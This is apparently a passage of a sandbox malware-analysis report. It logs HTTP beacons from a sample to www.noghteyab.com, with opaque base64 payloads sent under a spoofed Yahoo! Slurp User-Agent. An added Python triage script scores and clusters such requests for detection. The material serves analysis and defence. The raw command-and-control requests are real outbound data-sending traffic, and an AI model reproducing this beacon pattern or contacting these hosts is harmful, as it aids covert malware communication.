                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?D0Pts04=IRrESbehp9A4c0arrNhB2SQGHqYh5p2Ry9/8PtMUjfb6CsHcfdyH5ffjriDVQd7StG/Sopj8DEdssgOk9jRaqOeuB2qzCVXsHxIBR/Jt3DgaUXnoWNbvMCXYX6xoy7VuQx0h7Vc=&Q8s=tdcd5h7ptjmdxx"}</script></head></html>
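
Sessions 11 through 21 share one request shape regardless of the host contacted: a POST to a four-character path (/9ntw/, /8td2/, /euu6/, /wlsq/) carrying a single opaque form field named D0Pts04, sent under a Yahoo! Slurp crawler User-Agent with Origin and Referer pointing back at the same host and Connection: close, followed by a GET carrying the same field plus a short second parameter (Q8s=tdcd5h7ptjmdxx). The responses differ per host (Apache 404s from 203.161.41.207, an openresty page from 3.33.130.190 that redirects to /lander with the same query string, and later a 200 with a PHPSESSID cookie from 51.89.93.192), so the request, not the response, is the stable thing to key on. The Python below is an added triage example, not part of the Joe Sandbox report and not a vendor signature: it parses raw HTTP requests, scores the indicators visible in this capture, and groups flagged hosts by the field name so the rotation across domains within one run is visible. The sample requests are constructed here from sessions 13, 16 and 17 with shortened field values; the four-indicator threshold, the regex bounds and the benign control request are assumptions made for the example.

```python
"""Score raw HTTP requests for the beacon shape seen in the sessions above."""
import re
from urllib.parse import urlsplit

CRAWLER_UA = "Yahoo! Slurp"                         # search-engine bot UA sent by an endpoint process
SHORT_PATH = re.compile(r"^/[a-z0-9]{4}/$")         # /9ntw/, /8td2/, /euu6/, /wlsq/
OPAQUE = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")  # raw base64 alphabet, never URL-encoded
TAG = re.compile(r"^[a-z0-9]{4,20}$")              # the second GET parameter, e.g. Q8s=tdcd5h7ptjmdxx
FLAG_THRESHOLD = 4                                  # assumed cut-off for this example

UA = "User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

# Constructed samples: hostnames, paths, field name and User-Agent are copied from
# sessions 13, 16 and 17 above; the field values are shortened stand-ins; the last
# request is a benign control that does not appear in the report.
SAMPLE_REQUESTS = [
    "POST /8td2/ HTTP/1.1\r\nHost: www.atlpicsstudios.com\r\n"
    "Origin: http://www.atlpicsstudios.com\r\nConnection: close\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Referer: http://www.atlpicsstudios.com/8td2/\r\n" + UA + "\r\n\r\n"
    "D0Pts04=c+TIz73J0JxBGgv2ydpfqu7yfJ4wqJUrFClhr1+VJNk=",
    "GET /8td2/?D0Pts04=R87owMDlv/gPXB+iq45ci8jcRs8w9bUHCip7gwiELZto=&Q8s=tdcd5h7ptjmdxx HTTP/1.1\r\n"
    "Host: www.atlpicsstudios.com\r\nConnection: close\r\n" + UA + "\r\n\r\n",
    "POST /euu6/ HTTP/1.1\r\nHost: www.bearclaw.bot\r\n"
    "Origin: http://www.bearclaw.bot\r\nConnection: close\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Referer: http://www.bearclaw.bot/euu6/\r\n" + UA + "\r\n\r\n"
    "D0Pts04=FTDkRuuk2Ocrfwj7wI4vjDFYCsYm2qWYlOjNGKgfqvKvMfrAdtjE",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\nConnection: keep-alive\r\n\r\n",
]


def parse_request(raw):
    """Split one raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target = lines[0].split(" ")[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body.strip()


def form_pairs(encoded):
    """Split key=value&key=value without decoding: the opaque values use '+' and '/'
    literally, so urllib's plus-to-space rule would corrupt them."""
    pairs = []
    for chunk in encoded.split("&"):
        if chunk:
            key, _, value = chunk.partition("=")
            pairs.append((key, value))
    return pairs


def beacon_indicators(raw):
    """Return the indicators one request matches and whether it crosses the threshold."""
    method, target, headers, body = parse_request(raw)
    url = urlsplit(target)
    host = headers.get("host", "")
    hits = []
    if CRAWLER_UA in headers.get("user-agent", ""):
        hits.append("crawler_user_agent")
    if SHORT_PATH.match(url.path):
        hits.append("short_random_path")
    if headers.get("connection", "").lower() == "close":
        hits.append("connection_close")
    for name in ("origin", "referer"):          # a browser form post would come from a real page
        if host and urlsplit(headers.get(name, "")).hostname == host:
            hits.append("self_referencing_" + name)
    pairs = form_pairs(body if method == "POST" else url.query)
    if method == "POST" and len(pairs) == 1 and OPAQUE.match(pairs[0][1]):
        hits.append("single_opaque_form_field")
    if method == "GET" and len(pairs) == 2 and OPAQUE.match(pairs[0][1]) and TAG.match(pairs[1][1]):
        hits.append("opaque_query_with_tag")
    return {"host": host, "method": method, "path": url.path,
            "field": pairs[0][0] if pairs else None,
            "indicators": hits, "flagged": len(hits) >= FLAG_THRESHOLD}


def cluster_by_field(raws):
    """Group flagged hosts by field name: one name (D0Pts04) is reused across every domain in this run."""
    groups = {}
    for raw in raws:
        r = beacon_indicators(raw)
        if r["flagged"] and r["field"]:
            groups.setdefault(r["field"], set()).add(r["host"])
    return {field: sorted(hosts) for field, hosts in groups.items()}


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        r = beacon_indicators(raw)
        print(r["method"], r["host"] + r["path"], "FLAG" if r["flagged"] else "ok", r["indicators"])
    print(cluster_by_field(SAMPLE_REQUESTS))
```

Run against a proxy or IDS export of raw requests, the grouping by field name is what turns a list of unrelated-looking domains into one campaign, since the field name and the Q8s tag value stay constant while the host rotates. The threshold is deliberately loose for triage; a production rule would also require the source process context shown in the session header (a PID under C:\Program Files (x86)\ with a random directory name) rather than HTTP shape alone.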


                                                          Session ID: 21 | Source IP: 192.168.2.6 | Source Port: 49744 | Destination IP: 51.89.93.192 | Destination Port: 80 | PID: 5396 | Process: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:04:12.451656103 CEST | 722 | OUT | POST /wlsq/ HTTP/1.1
                                                          Host: www.noghteyab.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.noghteyab.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.noghteyab.com/wlsq/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 77 45 56 70 5a 6b 48 4f 30 6c 53 61 6f 6d 50 41 2f 63 48 6b 53 45 76 52 66 6f 59 44 4d 6e 6c 43 66 43 58 46 79 72 51 77 74 76 56 6b 2f 63 4c 76 6d 54 70 74 5a 47 56 6c 61 39 77 78 71 78 41 55 4c 75 2f 78 6c 61 61 6d 76 64 57 4b 45 74 50 6b 52 6c 2f 55 2b 6d 46 69 65 35 7a 6e 43 44 69 4b 4a 71 4e 61 30 50 6f 6c 78 76 52 38 57 4b 6b 46 50 38 75 77 39 71 4f 48 43 2b 66 45 2f 32 43 75 4c 74 44 74 6d 38 77 39 65 77 72 77 54 79 75 4a 38 6e 48 42 6b 6d 56 56 76 47 74 48 59 4d 38 69 58 72 79 78 65 64 74 6e 55 38 54 5a 36 6f 67 53 45 79 57 6b 49 34 52 2f 4d 75 75 70 6c 51 4f 6c 39 34 51 55 69 77 79 33 31 4e 42 6e
                                                          Data Ascii: D0Pts04=wEVpZkHO0lSaomPA/cHkSEvRfoYDMnlCfCXFyrQwtvVk/cLvmTptZGVla9wxqxAULu/xlaamvdWKEtPkRl/U+mFie5znCDiKJqNa0PolxvR8WKkFP8uw9qOHC+fE/2CuLtDtm8w9ewrwTyuJ8nHBkmVVvGtHYM8iXryxedtnU8TZ6ogSEyWkI4R/MuuplQOl94QUiwy31NBn
                                                          Jul 13, 2024 00:04:13.092093945 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Fri, 12 Jul 2024 22:04:12 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=gg5a4tm1c4tr3af48flbe1kcvi; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          Content-Encoding: gzip
                                                          Data Raw: 35 35 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 a5 57 cd 6e dc 36 10 3e db 4f c1 ea 50 b7 c0 ee ca 4e 93 d6 48 24 19 69 62 03 29 82 1c f2 07 f4 54 70 25 ee 8a 36 45 ca 24 b5 1b 3d 41 df a0 bd 14 bd 15 05 8a f6 d0 5b ef 79 95 22 e8 63 f4 1b 52 da 9f c0 09 02 78 61 60 b9 d2 cc 37 33 df fc d1 87 59 ed 1b 55 1c 66 b5 e0 55 71 78 90 79 e9 95 28 1e 9b 86 4b cd 5e 74 ae 15 da 49 a3 b3 34 be 80 44 23 3c 67 b5 f7 ed 54 5c 77 72 95 27 8f 8c f6 42 fb e9 cb be 15 09 2b e3 af 3c f1 e2 8d 4f 09 fd 01 2b 6b 6e 9d f0 79 e7 17 d3 d3 84 cc 28 a9 af 58 6d c5 22 3f 22 28 77 3f 4d 17 50 74 b3 a5 31 4b 25 78 2b dd ac 34 4d 5a 3a 77 b6 e0 8d 54 7d fe dc cc 8d 37 f7 ef 1e 1f 4f be 3a 3e 3e 62 56 a8 fc c8 f9 5e 09 57 0b e1 8f 98 87 fd fc 28 98 85 da 11 cc 8c 86 48 34 d9 8a 26 d1 72 52 71 cf d3 f8 38 7e cd a0 b7 75 ef 13 b4 14 bc 0c 2a 59 1a 09 cc e6 a6 ea 59 a9 b8 73 60 80 cf 95 98 ae 2d 6f 5b 61 03 ae 2b ad 6c 3d 73 b6 cc 93 31 ee f5 7a 3d 44 1d 22 b6 a2 e4 ad 07 63 29 48 98 5d ba b3 5a e5 42 27 45 96 46 e5 e2 f0 30 ab e4 6a [TRUNCATED]
                                                          Data Ascii: 554Wn6>OPNH$ib)Tp%6E$=A[y"cRxa`73YUfUqxy(K^tI4D#<gT\wr'B+<O+kny(Xm"?"(w?MPt1K%x+4MZ:wT}7O:>>bV^W(H4&rRq8~u*YYs`-o[a+l=s1z=D"c)H]ZB'EF0jF),Ik}\P8<8`QS'(=^2-m/I/O#<cZqd}1a'r,"9+OfY{yduz^lU#D^*,DX@q,.,oB78E]y[_/({-}-X_~o\x\[TXhsfU""w9za>BwP{'7MC</R:&u4r!KY!q']-<zZgm8gK-*8u\X7HDx97lO*xjX]=0LC}-5+Y;k3k-#|3O/<!:a0*D>@t7CPwL RxX'X{7c/.E s[`Nv-;h
                                                          Jul 13, 2024 00:04:13.092156887 CEST | 506 | IN | Data Raw: 2d 73 81 71 6d 98 32 88 d6 22 67 ce a8 95 80 8d 0b 84 12 f8 1f 52 03 13 06 8b 83 6c 50 96 07 41 a6 a9 c6 94 ea 27 ac c5 a2 74 62 f4 e3 83 a9 db a6 6a 00 1e 33 36 c2 0a a0 53 14 7b a4 44 52 e1 03 e1 a2 9b 16 c8 1e e4 b0 94 61 76 08 7b 4f 01 a8 25
                                                          Data Ascii: -sqm2"gRlPA'tbj36S{DRav{O%8bE% ;sr5RA$ajv%YM)p{7{N8kQ&'V6gszUxR|E)77%esr]/W


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          22 | 192.168.2.6 | 49745 | 51.89.93.192 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:04:14.984235048 CEST | 746 | OUT | POST /wlsq/ HTTP/1.1
                                                          Host: www.noghteyab.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.noghteyab.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.noghteyab.com/wlsq/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 77 45 56 70 5a 6b 48 4f 30 6c 53 61 36 57 2f 41 76 50 66 6b 65 30 76 53 42 34 59 44 44 48 6b 46 66 43 54 46 79 71 6b 61 74 39 68 6b 2f 35 76 76 6c 53 70 74 4a 57 56 6c 56 64 77 2b 75 78 41 66 4c 75 7a 44 6c 61 6d 6d 76 5a 2b 4b 45 73 2f 6b 51 53 4c 58 2b 32 46 67 46 4a 7a 6c 64 54 69 4b 4a 71 4e 61 30 50 39 74 78 76 4a 38 4b 71 55 46 41 39 75 7a 68 61 4f 41 56 4f 66 45 31 57 43 71 4c 74 44 45 6d 2b 56 67 65 79 54 77 54 7a 65 4a 38 57 48 43 76 6d 56 4d 69 6d 73 6c 49 63 77 6d 65 39 37 71 51 75 6c 54 48 2b 62 34 37 65 68 49 59 42 57 48 61 6f 78 39 4d 73 32 62 6c 77 4f 50 2f 34 6f 55 77 6e 2b 51 36 35 6b 45 5a 69 56 70 47 6c 73 6b 76 4a 6d 53 52 68 33 72 4c 50 48 61 44 51 3d 3d
                                                          Data Ascii: D0Pts04=wEVpZkHO0lSa6W/AvPfke0vSB4YDDHkFfCTFyqkat9hk/5vvlSptJWVlVdw+uxAfLuzDlammvZ+KEs/kQSLX+2FgFJzldTiKJqNa0P9txvJ8KqUFA9uzhaOAVOfE1WCqLtDEm+VgeyTwTzeJ8WHCvmVMimslIcwme97qQulTH+b47ehIYBWHaox9Ms2blwOP/4oUwn+Q65kEZiVpGlskvJmSRh3rLPHaDQ==
                                                          Jul 13, 2024 00:04:15.616523027 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Fri, 12 Jul 2024 22:04:15 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=sa9nccl13qdc11am521vrveose; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          Content-Encoding: gzip
                                                          Data Raw: 35 35 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 a5 57 cd 6e dc 36 10 3e db 4f c1 ea 50 b7 c0 ee ca 4e 93 d6 48 24 19 69 62 03 29 82 1c f2 07 f4 54 70 25 ee 8a 36 45 ca 24 b5 1b 3d 41 df a0 bd 14 bd 15 05 8a f6 d0 5b ef 79 95 22 e8 63 f4 1b 52 da 9f c0 09 02 78 61 60 b9 d2 cc 37 33 df fc d1 87 59 ed 1b 55 1c 66 b5 e0 55 71 78 90 79 e9 95 28 1e 9b 86 4b cd 5e 74 ae 15 da 49 a3 b3 34 be 80 44 23 3c 67 b5 f7 ed 54 5c 77 72 95 27 8f 8c f6 42 fb e9 cb be 15 09 2b e3 af 3c f1 e2 8d 4f 09 fd 01 2b 6b 6e 9d f0 79 e7 17 d3 d3 84 cc 28 a9 af 58 6d c5 22 3f 22 28 77 3f 4d 17 50 74 b3 a5 31 4b 25 78 2b dd ac 34 4d 5a 3a 77 b6 e0 8d 54 7d fe dc cc 8d 37 f7 ef 1e 1f 4f be 3a 3e 3e 62 56 a8 fc c8 f9 5e 09 57 0b e1 8f 98 87 fd fc 28 98 85 da 11 cc 8c 86 48 34 d9 8a 26 d1 72 52 71 cf d3 f8 38 7e cd a0 b7 75 ef 13 b4 14 bc 0c 2a 59 1a 09 cc e6 a6 ea 59 a9 b8 73 60 80 cf 95 98 ae 2d 6f 5b 61 03 ae 2b ad 6c 3d 73 b6 cc 93 31 ee f5 7a 3d 44 1d 22 b6 a2 e4 ad 07 63 29 48 98 5d ba b3 5a e5 42 27 45 96 46 e5 e2 f0 30 ab e4 6a [TRUNCATED]
                                                          Data Ascii: 554Wn6>OPNH$ib)Tp%6E$=A[y"cRxa`73YUfUqxy(K^tI4D#<gT\wr'B+<O+kny(Xm"?"(w?MPt1K%x+4MZ:wT}7O:>>bV^W(H4&rRq8~u*YYs`-o[a+l=s1z=D"c)H]ZB'EF0jF),Ik}\P8<8`QS'(=^2-m/I/O#<cZqd}1a'r,"9+OfY{yduz^lU#D^*,DX@q,.,oB78E]y[_/({-}-X_~o\x\[TXhsfU""w9za>BwP{'7MC</R:&u4r!KY!q']-<zZgm8gK-*8u\X7HDx97lO*xjX]=0LC}-5+Y;k3k-#|3O/<!:a0*D>@t7CPwL RxX'X{7c/.E s[`Nv-;h
                                                          Jul 13, 2024 00:04:15.616588116 CEST | 506 | IN | Data Raw: 2d 73 81 71 6d 98 32 88 d6 22 67 ce a8 95 80 8d 0b 84 12 f8 1f 52 03 13 06 8b 83 6c 50 96 07 41 a6 a9 c6 94 ea 27 ac c5 a2 74 62 f4 e3 83 a9 db a6 6a 00 1e 33 36 c2 0a a0 53 14 7b a4 44 52 e1 03 e1 a2 9b 16 c8 1e e4 b0 94 61 76 08 7b 4f 01 a8 25
                                                          Data Ascii: -sqm2"gRlPA'tbj36S{DRav{O%8bE% ;sr5RA$ajv%YM)p{7{N8kQ&'V6gszUxR|E)77%esr]/W


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          23 | 192.168.2.6 | 49746 | 51.89.93.192 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:04:17.518085957 CEST | 1759 | OUT | POST /wlsq/ HTTP/1.1
                                                          Host: www.noghteyab.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.noghteyab.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.noghteyab.com/wlsq/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 77 45 56 70 5a 6b 48 4f 30 6c 53 61 36 57 2f 41 76 50 66 6b 65 30 76 53 42 34 59 44 44 48 6b 46 66 43 54 46 79 71 6b 61 74 39 5a 6b 38 50 7a 76 6c 78 42 74 4b 57 56 6c 63 39 77 39 75 78 41 43 4c 75 72 48 6c 61 72 54 76 62 32 4b 46 4f 33 6b 58 6e 6e 58 30 32 46 67 61 35 7a 6b 43 44 6a 49 4a 71 63 54 30 50 74 74 78 76 4a 38 4b 6f 4d 46 4a 4d 75 7a 6a 61 4f 48 43 2b 66 79 2f 32 43 53 4c 74 62 2b 6d 2b 42 77 65 44 7a 77 53 54 4f 4a 73 77 7a 43 77 57 56 4f 78 57 73 44 49 63 39 34 65 38 54 6d 51 74 34 45 48 2b 76 34 37 35 55 4e 46 51 4b 41 50 4c 45 66 5a 4d 43 4c 38 6b 2f 34 34 72 64 31 2f 78 4f 76 7a 34 55 67 59 30 59 7a 41 6a 31 35 68 6f 57 51 5a 45 61 50 4b 2b 32 73 65 65 71 53 79 30 78 36 6e 49 69 5a 69 2b 6f 4f 47 39 6d 47 32 6e 71 64 54 33 4b 46 64 44 57 55 41 6b 52 43 65 6d 6c 73 4f 6b 44 54 34 75 57 35 58 6b 68 71 49 53 41 37 30 78 62 53 50 74 41 4f 57 2f 61 6b 30 49 2b 5a 77 78 41 71 43 72 4b 6a 32 75 6d 32 33 32 67 39 58 47 35 76 73 44 38 6f 69 57 58 6e 4e 59 30 64 4d 73 [TRUNCATED]
                                                          Data Ascii: D0Pts04=wEVpZkHO0lSa6W/AvPfke0vSB4YDDHkFfCTFyqkat9Zk8PzvlxBtKWVlc9w9uxACLurHlarTvb2KFO3kXnnX02Fga5zkCDjIJqcT0PttxvJ8KoMFJMuzjaOHC+fy/2CSLtb+m+BweDzwSTOJswzCwWVOxWsDIc94e8TmQt4EH+v475UNFQKAPLEfZMCL8k/44rd1/xOvz4UgY0YzAj15hoWQZEaPK+2seeqSy0x6nIiZi+oOG9mG2nqdT3KFdDWUAkRCemlsOkDT4uW5XkhqISA70xbSPtAOW/ak0I+ZwxAqCrKj2um232g9XG5vsD8oiWXnNY0dMsNyeptAtNduO8ux6MTAoX4jiR8Ii6e9851tnLafO/aYz47KWavc+tZh6CIZMIxjSS3B/NzJrFQd42mhOwPwouR/qGDVeCw/E+B6po8ov4CAJOyMk8evvSd5XJF5568k0cK15+AxMfUVx5UFNhbxRoUGhpNrmxKyIP2TqgWFoClawjpA3u5lzMrtLeF6RbBdDUIHC/0hj00p9rSFLljQpl2THfkr/cszJJfExiWUe79FXAikeV7n4wjZuETF8JvnyZX5o7qkj1HopwXn5L6dtLg/q4Bl7uk90L2UQuvHFY8v+QjR+JLVpYP97EaWsP7HnzZRdFm63d9IZl0f8ZN3TUvepsl2K81LQs+LiwzUcULGxmnsJMfYXrva4uO/rUtubH0emCUBoAjj0RXvICS6TCDG2gVm12N4Rvl2ug9owOQbw16xJ9/0wq0apKRSe8oFSlPDttunpJsox4ASiflkzcXxVOg7jkIoyWJz4R8Z0Bn5fOe+esBU/5OYLBS9OMV4MPcZDAuDptXnTidHrYXwjhUEIVHZh7FWhFhh4klw4wLahMd7CAGwgJ9eRZn8VWZFoUfsDEL6+4Xi9lFlW28ftt4nfdduYLqupl7fRw30xAtkoMLBDAm0HghUQmE+tHF/EgujWSFM/PZ8BgtT65cB+0hkWwqLJgzWBejg [TRUNCATED]
                                                          Jul 13, 2024 00:04:18.154594898 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Fri, 12 Jul 2024 22:04:18 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=1sk8rsuoi1lhaen026plm6b4d7; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          Content-Encoding: gzip
                                                          Data Raw: 35 35 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 a5 57 cd 6e dc 36 10 3e db 4f c1 ea 50 b7 c0 ee ca 4e 93 d6 48 24 19 69 62 03 29 82 1c f2 07 f4 54 70 25 ee 8a 36 45 ca 24 b5 1b 3d 41 df a0 bd 14 bd 15 05 8a f6 d0 5b ef 79 95 22 e8 63 f4 1b 52 da 9f c0 09 02 78 61 60 b9 d2 cc 37 33 df fc d1 87 59 ed 1b 55 1c 66 b5 e0 55 71 78 90 79 e9 95 28 1e 9b 86 4b cd 5e 74 ae 15 da 49 a3 b3 34 be 80 44 23 3c 67 b5 f7 ed 54 5c 77 72 95 27 8f 8c f6 42 fb e9 cb be 15 09 2b e3 af 3c f1 e2 8d 4f 09 fd 01 2b 6b 6e 9d f0 79 e7 17 d3 d3 84 cc 28 a9 af 58 6d c5 22 3f 22 28 77 3f 4d 17 50 74 b3 a5 31 4b 25 78 2b dd ac 34 4d 5a 3a 77 b6 e0 8d 54 7d fe dc cc 8d 37 f7 ef 1e 1f 4f be 3a 3e 3e 62 56 a8 fc c8 f9 5e 09 57 0b e1 8f 98 87 fd fc 28 98 85 da 11 cc 8c 86 48 34 d9 8a 26 d1 72 52 71 cf d3 f8 38 7e cd a0 b7 75 ef 13 b4 14 bc 0c 2a 59 1a 09 cc e6 a6 ea 59 a9 b8 73 60 80 cf 95 98 ae 2d 6f 5b 61 03 ae 2b ad 6c 3d 73 b6 cc 93 31 ee f5 7a 3d 44 1d 22 b6 a2 e4 ad 07 63 29 48 98 5d ba b3 5a e5 42 27 45 96 46 e5 e2 f0 30 ab e4 6a [TRUNCATED]
                                                          Data Ascii: 554Wn6>OPNH$ib)Tp%6E$=A[y"cRxa`73YUfUqxy(K^tI4D#<gT\wr'B+<O+kny(Xm"?"(w?MPt1K%x+4MZ:wT}7O:>>bV^W(H4&rRq8~u*YYs`-o[a+l=s1z=D"c)H]ZB'EF0jF),Ik}\P8<8`QS'(=^2-m/I/O#<cZqd}1a'r,"9+OfY{yduz^lU#D^*,DX@q,.,oB78E]y[_/({-}-X_~o\x\[TXhsfU""w9za>BwP{'7MC</R:&u4r!KY!q']-<zZgm8gK-*8u\X7HDx97lO*xjX]=0LC}-5+Y;k3k-#|3O/<!:a0*D>@t7CPwL RxX'X{7c/.E s[`Nv-;h
                                                          Jul 13, 2024 00:04:18.154643059 CEST | 506 | IN | Data Raw: 2d 73 81 71 6d 98 32 88 d6 22 67 ce a8 95 80 8d 0b 84 12 f8 1f 52 03 13 06 8b 83 6c 50 96 07 41 a6 a9 c6 94 ea 27 ac c5 a2 74 62 f4 e3 83 a9 db a6 6a 00 1e 33 36 c2 0a a0 53 14 7b a4 44 52 e1 03 e1 a2 9b 16 c8 1e e4 b0 94 61 76 08 7b 4f 01 a8 25
                                                          Data Ascii: -sqm2"gRlPA'tbj36S{DRav{O%8bE% ;sr5RA$ajv%YM)p{7{N8kQ&'V6gszUxR|E)77%esr]/W


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          24 | 192.168.2.6 | 49747 | 51.89.93.192 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:04:20.054097891 CEST | 467 | OUT | GET /wlsq/?D0Pts04=9G9JaQreu1q7pVWdntSqemfrZt4YMEwdEWH52d0+9tQM8/+noicIREkWd/c/vCZ1acCjjeuAo42rGPHTfjnYxH4zd6/SeR7TYZgVkfp3oOFdRtlOKMiyqIOaPcilhWS9JI76xLs=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.noghteyab.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:04:20.682537079 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Fri, 12 Jul 2024 22:04:20 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=fcvfe57hljgq72sn8l4jeab5ap; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          Data Raw: 31 30 38 63 0d 0a 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 53 75 73 70 65 6e 73 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 09 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 64 61 74 61 2f 73 74 79 6c 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 64 61 74 61 2f 73 74 79 6c 65 73 2f 6c 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 [TRUNCATED]
